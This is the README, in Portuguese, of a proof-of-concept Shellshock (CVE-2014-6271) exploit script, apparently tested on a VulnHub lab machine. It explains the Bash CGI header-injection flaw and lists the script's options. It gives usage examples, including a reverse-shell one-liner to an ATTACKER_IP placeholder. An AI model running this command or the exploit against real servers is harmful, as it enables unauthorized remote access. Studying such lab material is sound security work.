
Exploit CVE-2014-6271 | por infrar3d
Explorado por infrar3d
Este repositório contém um exploit de prova de conceito para CVE-2014-6271 (Shellshock).
Shellshock é uma vulnerabilidade crítica no GNU Bash onde variáveis de ambiente especialmente elaboradas permitem a execução arbitrária de comandos.
Quando um servidor web passa cabeçalhos HTTP para scripts CGI que invocam o Bash, um atacante pode injetar comandos através desses cabeçalhos.
./shellshock_exp.sh -h
shellshock_exp.sh [options]
Options:
-h | --help print this message and exit
-a | --address target address (default is "localhost")
-p | --port target port (default is 80)
-f | --file target file (default is "/cgi-bin/shell.sh")
-c | --command command to execute on the target machine (default is "id")
./shellshock_exp.sh -a 192.168.1.10
./shellshock_exp.sh -a 192.168.1.10 -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
(testado na máquina VulnHub "Hacksudo - Thor")
Este software e código de prova de conceito é fornecido apenas para fins educacionais e de pesquisa.
Você é responsável por obedecer a todas as leis aplicáveis. Use de forma ética e responsável.